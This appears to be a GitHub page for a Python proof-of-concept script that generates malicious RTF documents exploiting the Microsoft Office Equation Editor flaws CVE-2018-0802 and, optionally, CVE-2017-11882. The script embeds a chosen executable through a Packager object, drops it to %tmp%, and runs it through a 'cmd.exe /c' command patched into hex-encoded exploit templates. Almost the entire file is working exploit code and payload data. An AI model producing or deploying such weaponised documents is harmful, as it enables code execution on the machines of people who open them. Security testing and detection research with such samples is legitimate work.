forked from rxwx/CVE-2018-0802
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathpackager_exec_CVE-2018-0802.py
338 lines (307 loc) · 20.6 KB
/
packager_exec_CVE-2018-0802.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
import argparse
import os
import struct
class Package(object):
"""
Packager spec based on:
https://phishme.com/rtf-malware-delivery/
Dropping method by Haifei Li:
https://securingtomorrow.mcafee.com/mcafee-labs/dropping-files-temp-folder-raises-security-concerns/
Found being used itw by @MalwareParty:
https://twitter.com/MalwareParty/status/943861021260861440
"""
def __init__(self, filename):
self.filename = os.path.basename(filename)
self.fakepath = 'C:\\fakepath\\{}'.format(self.filename)
self.orgpath = self.fakepath
self.datapath = self.fakepath
with open(filename,'rb') as f:
self.data = f.read()
self.OBJ_HEAD = r"{\object\objemb\objw1\objh1{\*\objclass Package}{\*\objdata "
self.OBJ_TAIL = r"0105000000000000}}"
def get_object_header(self):
OLEVersion = '01050000'
FormatID = '02000000'
ClassName = 'Package'
szClassName = struct.pack("<I", len(ClassName) + 1).encode('hex')
szPackageData = struct.pack("<I", len(self.get_package_data())/2).encode('hex')
return ''.join([
OLEVersion,
FormatID,
szClassName,
ClassName.encode('hex') + '00',
'00000000',
'00000000',
szPackageData,
])
def get_package_data(self):
StreamHeader = '0200'
Label = self.filename.encode('hex') + '00'
OrgPath = self.orgpath.encode('hex') + '00'
UType = '00000300'
DataPath = self.datapath.encode('hex') + '00'
DataPathLen = struct.pack("<I", len(self.datapath)+1).encode('hex')
DataLen = struct.pack("<I", len(self.data)).encode('hex')
Data = self.data.encode('hex')
OrgPathWLen = struct.pack("<I", len(self.datapath)).encode('hex')
OrgPathW = self.datapath.encode('utf-16le').encode('hex')
LabelLen = struct.pack("<I", len(self.filename)).encode('hex')
LabelW = self.filename.encode('utf-16le').encode('hex')
DefPathWLen = struct.pack("<I", len(self.orgpath)).encode('hex')
DefPathW = self.orgpath.encode('utf-16le').encode('hex')
return ''.join([
StreamHeader,
Label,
OrgPath,
UType,
DataPathLen,
DataPath,
DataLen,
Data,
OrgPathWLen,
OrgPathW,
LabelLen,
LabelW,
DefPathWLen,
DefPathW,
])
def build_package(self):
return self.OBJ_HEAD + self.get_object_header() + self.get_package_data() + self.OBJ_TAIL
RTF_HEADER = R"""{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Calibri;}}
{\*\generator Riched20 6.3.9600}\viewkind4\uc1
\pard\sa200\sl276\slmult1\f0\fs22\lang9"""
RTF_TRAILER = R"""\par}
"""
OBJECT_HEADER = R"""{\object\objemb\objupdate{\*\objclass Equation.3}\objw380\objh260{\*\objdata """
OBJECT_TRAILER = R"""
}{\result{\pict{\*\picprop}\wmetafile8\picw380\pich260\picwgoal380\pichgoal260
0100090000039e00000002001c0000000000050000000902000000000500000002010100000005
0000000102ffffff00050000002e0118000000050000000b0200000000050000000c02a0016002
1200000026060f001a00ffffffff000010000000c0ffffffc6ffffff20020000660100000b0000
0026060f000c004d61746854797065000020001c000000fb0280fe000000000000900100000000
0402001054696d6573204e657720526f6d616e00feffffff5f2d0a6500000a0000000000040000
002d01000009000000320a6001100003000000313131000a00000026060f000a00ffffffff0100
000000001c000000fb021000070000000000bc02000000000102022253797374656d000048008a
0100000a000600000048008a01ffffffff6ce21800040000002d01010004000000f00100000300
00000000
}}}
"""
OBJDATA_TEMPLATE_0802 = R"""
01050000020000000B0000004571756174696F6E2E33000000000000000000000E0000D0CF11E0A1
B11AE1000000000000000000000000000000003E000300FEFF090006000000000000000000000001
0000000100000000000000001000000200000001000000FEFFFFFF0000000000000000FFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFDFFFFFF04000000FEFFFFFF05
000000FEFFFFFFFEFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF52006F006F007400200045006E0074007200790000
00000000000000000000000000000000000000000000000000000000000000000000000000000000
00000016000500FFFFFFFFFFFFFFFF0200000002CE020000000000C0000000000000460000000000
00000000000000B024837CC473D30103000000C00300000000000001004F006C0065000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000A000201FFFFFFFFFFFFFFFFFFFFFFFF00000000000000000000000000
0000000000000000000000000000000000000000000000000000001400000000000000010043006F
006D0070004F0062006A000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000120002010100000004000000FFFFFFFF0000000000
00000000000000000000000000000000000000000000000000000000000000010000006600000000
00000003004F0062006A0049006E0066006F00000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000012000201FFFFFFFFFFFFFFFFFF
FFFFFF00000000000000000000000000000000000000000000000000000000000000000000000003
0000000600000000000000FEFFFFFF02000000FEFFFFFFFEFFFFFF05000000060000000700000008
00000009000000FEFFFFFFFEFFFFFF0C0000000D0000000E000000FEFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFF01000002000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000100FEFF030A0000FFFFFFFF02
CE020000000000C000000000000046170000004D6963726F736F6674204571756174696F6E20332E
30000C0000004453204571756174696F6E000B0000004571756174696F6E2E3300F439B271000000
00000000000000000000000000000000000000000000000000000000000000000000000000030004
00000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000FFFFFFFF030000000400000001000000FFFFFFFF01
000000000000007C010000040100003C0100000100090000039E00000002001C0000000000050000
0009020000000005000000020101000000050000000102FFFFFF00050000002E0118000000050000
000B0200000000050000000C02A00160021200000026060F001A00FFFFFFFF000010000000C0FFFF
FFC6FFFFFF20020000660100000B00000026060F000C004D61746854797065000020001C000000FB
0280FE0000000000009001000000000402001054696D6573204E657720526F6D616E00FEFFFFFF5F
2D0A6500000A0000000000040000002D01000009000000320A6001100003000000202002004F006C
00650050007200650073003000300030000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000180002000300000005000000FFFFFFFF0000000000
00000000000000000000000000000000000000000000000000000000000000040000007E01000000
0000005200690063006800450064006900740046006C006100670073000000000000000000000000
0000000000000000000000000000000000000000000000000000001C000201FFFFFFFF06000000FF
FFFFFF0000000000000000000000000000000000000000000000000000000000000000000000000A
0000000C000000000000004500710075006100740069006F006E0020004E00610074006900760065
000000000000000000000000000000000000000000000000000000000000000000000020000200FF
FFFFFFFFFFFFFFFFFFFFFF0000000000000000000000000000000000000000000000000000000000
000000000000000B000000C500000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000FFFFFFFFFFFFFFFFFFFFFFFF000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000020000A00000026060F000A00FF
FFFFFF0100000000001C000000FB021000070000000000BC02000000000102022253797374656D00
0048008A0100000A000600000048008A01FFFFFFFF6CE21800040000002D01010004000000F00100
000300000000000000000000000000000000000000000000004E414E490000000000000100000000
00000001000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000001C00000002009EC4A900000000000000C8A75C00C4
EE5B0000000000030100030A0A08000133C0508D44245250EB7F2020202020202020202020202020
20202020202020202020202020202020202020202020202020202020202020202020202020202020
20202020202020202020202020202020202020202020202020202020202020202020202020202020
202020202020202020202020202020202020202020202020202020202020202026908B44242C662D
51A8FFE0250000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000001050000050000000D0000004D45544146494C4550
494354007C010000FCFEFFFF4401000008007C01040100000100090000039E00000002001C000000
00000500000009020000000005000000020101000000050000000102FFFFFF00050000002E011800
0000050000000B0200000000050000000C02A00160021200000026060F001A00FFFFFFFF00001000
0000C0FFFFFFC6FFFFFF20020000660100000B00000026060F000C004D6174685479706500002000
1C000000FB0280FE0000000000009001000000000402001054696D6573204E657720526F6D616E00
FEFFFFFF5F2D0A6500000A0000000000040000002D01000009000000320A60011000030000002020
20000A00000026060F000A00FFFFFFFF0100000000001C000000FB021000070000000000BC020000
00000102022253797374656D000048008A0100000A000600000048008A01FFFFFFFF6CE218000400
00002D01010004000000F0010000030000000000
"""
OBJDATA_TEMPLATE_11882 = R"""
01050000020000000b0000004571756174696f6e2e33000000000000000000000c0000d0cf11e0a1
b11ae1000000000000000000000000000000003e000300feff090006000000000000000000000001
0000000100000000000000001000000200000001000000feffffff0000000000000000ffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
fffffffffffffffffffffffffffffffffffffffffffffffffffffffdffffff04000000fefffffffe
fffffffeffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffff52006f006f007400200045006e0074007200790000
00000000000000000000000000000000000000000000000000000000000000000000000000000000
00000016000500ffffffffffffffff0200000002ce020000000000c0000000000000460000000000
000000000000008020cea5613cd30103000000000200000000000001004f006c0065000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000a000201ffffffffffffffffffffffff00000000000000000000000000
0000000000000000000000000000000000000000000000000000001400000000000000010043006f
006d0070004f0062006a000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000120002010100000003000000ffffffff0000000000
00000000000000000000000000000000000000000000000000000000000000010000006600000000
00000003004f0062006a0049006e0066006f00000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000012000201ffffffff04000000ff
ffffff00000000000000000000000000000000000000000000000000000000000000000000000003
0000000600000000000000feffffff02000000fefffffffeffffff050000000600000007000000fe
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffff01000002080000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000100feff030a0000ffffffff02
ce020000000000c000000000000046170000004d6963726f736f6674204571756174696f6e20332e
30000c0000004453204571756174696f6e000b0000004571756174696f6e2e3300f439b271000000
00000000000000000000000000000000000000000000000000000000000000000000000000030004
00000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000001c00000002009ec4a900000000000000c8a75c00c4
ee5b0000000000030101030a0a01085a5a4141414141414141414141414141414141414141414141
414141414141414141414141414141414141414141120c4300000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000004500710075
006100740069006f006e0020004e0061007400690076006500000000000000000000000000000000
0000000000000000000000000000000000000020000200ffffffffffffffffffffffff0000000000
0000000000000000000000000000000000000000000000000000000000000004000000c500000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000ffffffffffffffffff
ffffff00000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000ff
ffffffffffffffffffffff0000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000ffffffffffffffffffffffff000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000001050000050000000d0000004d
45544146494c4550494354003421000035feffff9201000008003421cb010000010009000003c500
000002001c00000000000500000009020000000005000000020101000000050000000102ffffff00
050000002e0118000000050000000b0200000000050000000c02a001201e1200000026060f001a00
ffffffff000010000000c0ffffffc6ffffffe01d0000660100000b00000026060f000c004d617468
54797065000020001c000000fb0280fe0000000000009001000000000402001054696d6573204e65
7720526f6d616e00feffffff6b2c0a0700000a0000000000040000002d0100000c000000320a6001
90160a000000313131313131313131310c000000320a6001100f0a00000031313131313131313131
0c000000320a600190070a000000313131313131313131310c000000320a600110000a0000003131
31313131313131310a00000026060f000a00ffffffff0100000000001c000000fb02100007000000
0000bc02000000000102022253797374656d000048008a0100000a000600000048008a01ffffffff
7cef1800040000002d01010004000000f0010000030000000000
"""
def create_ole_exec_primitive(command, objdata_template, command_offset, max_len):
if len(command) > max_len:
raise ValueError("primitive command must be shorter than %d bytes" % max_len)
hex_command = command.ljust(max_len).encode("hex")
objdata_hex_stream = objdata_template.translate(None, "\r\n")
ole_data = objdata_hex_stream[:command_offset] + hex_command + objdata_hex_stream[command_offset + len(hex_command):]
return OBJECT_HEADER + ole_data + OBJECT_TRAILER
def create_rtf(header, trailer, executable, double):
# CVE-2018-0802 exploit
ole1 = create_ole_exec_primitive("cmd.exe /c%tmp%\\{}".format(os.path.basename(executable)), OBJDATA_TEMPLATE_0802, (0xd12*2), 126)
p = Package(executable)
package = p.build_package()
outbuf = header + package + ole1
if double:
# CVE-2017-11882 exploit
outbuf += create_ole_exec_primitive("cmd.exe /c%tmp%\\{}".format(os.path.basename(executable)), OBJDATA_TEMPLATE_11882, (0x949*2), 43)
return outbuf + trailer
if __name__ == '__main__':
parser = argparse.ArgumentParser(description="PoC for CVE-2018-0802 using Packager.dll file drop method")
parser.add_argument("-e", "--executable", help="File to ebmed and exec", required=True)
parser.add_argument('-o', "--output", help="Output exploit rtf", required=True)
parser.add_argument('-d', "--double", help="Double-whammy! Exploits both CVE-2018-0802 and CVE-2017-11882 in the same document.", action="store_true")
args = parser.parse_args()
with open(args.output, 'w') as f:
f.write(create_rtf(RTF_HEADER, RTF_TRAILER, args.executable, args.double))
print "[+] Completed!"